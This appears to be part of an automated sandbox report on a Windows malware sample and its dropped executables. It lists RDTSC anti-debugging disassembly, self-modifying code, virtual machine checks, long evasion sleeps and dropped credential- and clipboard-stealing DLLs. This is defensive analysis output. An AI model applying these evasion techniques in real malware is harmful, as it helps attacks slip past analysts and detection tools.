Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54206BE second address: 5420706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F17B0CB142Eh 0x0000000f push eax 0x00000010 jmp 00007F17B0CB142Bh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17B0CB1435h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420706 second address: 5420716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC26Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420716 second address: 5420763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FBB370h] 0x0000000d jmp 00007F17B0CB1437h 0x00000012 xor dword ptr [ebp-08h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx ebx, si 0x0000001b pushfd 0x0000001c jmp 00007F17B0CB142Ch 0x00000021 or esi, 511366C8h 0x00000027 jmp 00007F17B0CB142Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420763 second address: 54207BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d jmp 00007F17B0FBC273h 0x00000012 nop 0x00000013 jmp 00007F17B0FBC276h 0x00000018 push eax 0x00000019 jmp 00007F17B0FBC26Bh 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F17B0FBC275h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54207BE second address: 5420821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F17B0CB1437h 0x00000008 pop esi 0x00000009 mov ax, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F17B0CB142Ah 0x00000019 pushfd 0x0000001a jmp 00007F17B0CB1432h 0x0000001f and eax, 7E1AD2A8h 0x00000025 jmp 00007F17B0CB142Bh 0x0000002a popfd 0x0000002b popad 0x0000002c popad 0x0000002d mov dword ptr fs:[00000000h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420821 second address: 5420827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420827 second address: 542083E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542083E second address: 542085B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542085B second address: 542086B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542086B second address: 5420904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b pushad 0x0000000c mov di, 04B0h 0x00000010 jmp 00007F17B0FBC279h 0x00000015 popad 0x00000016 test eax, eax 0x00000018 pushad 0x00000019 mov dx, ax 0x0000001c push esi 0x0000001d pushfd 0x0000001e jmp 00007F17B0FBC26Fh 0x00000023 adc cl, FFFFFFBEh 0x00000026 jmp 00007F17B0FBC279h 0x0000002b popfd 0x0000002c pop eax 0x0000002d popad 0x0000002e jne 00007F1822A5B6BFh 0x00000034 jmp 00007F17B0FBC277h 0x00000039 sub eax, eax 0x0000003b pushad 0x0000003c mov bl, D0h 0x0000003e jmp 00007F17B0FBC26Eh 0x00000043 popad 0x00000044 mov dword ptr [ebp-20h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420904 second address: 542090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542090B second address: 542099F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17B0FBC26Bh 0x00000009 or eax, 376688DEh 0x0000000f jmp 00007F17B0FBC279h 0x00000014 popfd 0x00000015 mov ecx, 6029A7A7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebx, dword ptr [esi] 0x0000001f pushad 0x00000020 mov dx, si 0x00000023 mov edx, eax 0x00000025 popad 0x00000026 mov dword ptr [ebp-24h], ebx 0x00000029 pushad 0x0000002a mov di, cx 0x0000002d pushfd 0x0000002e jmp 00007F17B0FBC278h 0x00000033 sbb al, 00000038h 0x00000036 jmp 00007F17B0FBC26Bh 0x0000003b popfd 0x0000003c popad 0x0000003d test ebx, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov bh, 9Bh 0x00000044 pushfd 0x00000045 jmp 00007F17B0FBC26Ch 0x0000004a xor ch, FFFFFF98h 0x0000004d jmp 00007F17B0FBC26Bh 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542099F second address: 54209A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410EC9 second address: 5410F26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007F17B0FBC26Bh 0x0000000c sub ax, 361Eh 0x00000011 jmp 00007F17B0FBC279h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F17B0FBC271h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F17B0FBC26Eh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410F26 second address: 5410F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410F2A second address: 5410F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410F2E second address: 5410F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410F34 second address: 5410F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC26Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CB072B second address: CB072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CB072F second address: CB0761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC278h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17B0FBC273h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7A2A second address: CC7A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0CB1430h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7A40 second address: CC7A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7A45 second address: CC7A67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F17B0CB1426h 0x00000013 jmp 00007F17B0CB142Fh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7A67 second address: CC7A71 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7A71 second address: CC7A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F17B0CB1426h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7BE4 second address: CC7BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F17B0FBC26Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7BFD second address: CC7C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Special instruction interceptor: First address: CAEC6E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Special instruction interceptor: First address: E5F914 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Special instruction interceptor: First address: EF0762 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: B3EC6E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: CEF914 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: D80762 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: D6B995 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: F25D6E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: FAA64E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 78B995 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 945D6E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 9CA64E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Special instruction interceptor: First address: CD5B03 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Special instruction interceptor: First address: CD59FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Special instruction interceptor: First address: E7071C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Special instruction interceptor: First address: E7039A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Special instruction interceptor: First address: E978BA instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 785B03 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 7859FF instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 92071C instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 92039A instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 9478BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 435B03 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 4359FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 5D071C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 5D039A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 5F78BA instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_05470C1D rdtsc 0_2_05470C1D
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4858
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4988
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Window / User API: threadDelayed 1127
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Window / User API: threadDelayed 453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8771
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 590
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Window / User API: threadDelayed 1260
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Window / User API: threadDelayed 355
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Window / User API: threadDelayed 469
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\sarra[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cred64[1].dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6808 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6808 Thread sleep time: -62031s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7216 Thread sleep time: -54027s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7076 Thread sleep count: 202 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7076 Thread sleep time: -6060000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7184 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7184 Thread sleep time: -72036s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5460 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5460 Thread sleep time: -82041s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2004 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2840 Thread sleep time: -58029s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4416 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4416 Thread sleep time: -62031s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7076 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6236 Thread sleep time: -59000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7916 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7920 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7772 Thread sleep count: 132 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7772 Thread sleep time: -3960000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 2360 Thread sleep time: -1080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7772 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8048 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe TID: 4500 Thread sleep count: 83 > 30
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe TID: 4828 Thread sleep count: 32 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6448 Thread sleep count: 37 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6448 Thread sleep time: -37000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep count: 8771 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep count: 590 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe TID: 8104 Thread sleep count: 1260 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe TID: 8104 Thread sleep count: 355 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7740 Thread sleep count: 47 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6016 Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe TID: 4948 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe TID: 4948 Thread sleep count: 111 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8112 Thread sleep count: 44 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8112 Thread sleep count: 98 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe TID: 2648 Thread sleep count: 469 > 30
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Thread sleep count: Count: 1127 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Thread sleep count: Count: 1260 delay: -10
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini Jump to behavior
Source: explorha.exe, explorha.exe, 00000006.00000002.2910760294.0000000000CD0000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000006.00000000.2298675469.0000000000CD0000.00000080.00000001.01000000.00000007.sdmp, amert.exe, 0000000C.00000002.2419990538.0000000000EFF000.00000040.00000001.01000000.0000000B.sdmp, chrosha.exe, 00000010.00000002.2898369234.000000000091F000.00000040.00000001.01000000.00000011.sdmp, 590971cd60.exe, 00000014.00000002.2887101333.0000000000E52000.00000040.00000001.01000000.00000014.sdmp, explorha.exe, 00000024.00000000.2531196988.0000000000CD0000.00000080.00000001.01000000.00000007.sdmp, MPGPH131.exe, 00000026.00000002.2747934122.0000000000902000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: MPGPH131.exe, 00000026.00000003.2572826280.00000000013EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: amert.exe, 0000000C.00000003.2401877361.00000000014EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}uQ0C\
Source: MPGPH131.exe, 00000026.00000002.2749346705.00000000013D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
